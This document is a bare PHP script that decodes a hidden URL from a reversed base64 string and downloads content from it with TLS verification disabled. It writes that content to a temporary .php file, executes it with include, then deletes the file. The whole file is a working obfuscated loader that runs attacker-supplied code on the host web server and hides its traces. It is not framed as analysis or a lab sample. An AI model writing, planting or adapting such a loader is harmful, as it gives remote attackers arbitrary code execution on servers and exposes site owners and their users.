<?php
$a = "==wL0V2ZulGbn92YyV2Zz9GbgUGbpR2bj5WauR2bl3M9UnZ0Z3biRHbhNHbuFmZzV2XyR3YlRnbvN2X0V2ZuRGb";
$b = base64_decode(strrev($a));

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $b);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0");

$d = curl_exec($ch);
curl_close($ch);

if (!$d) {
    $d = @file_get_contents($b);
}

if ($d) {
    $f = "t_" . time() . ".php";
    $c = (strpos($d, '<?php') === false) ? '<?php ' . $d : $d;
    if (file_put_contents($f, $c)) {
        include($f);
        @unlink($f);
    }
} else {
    echo "Koneksi ke sumber kode ditolak oleh sistem keamanan server.";
}
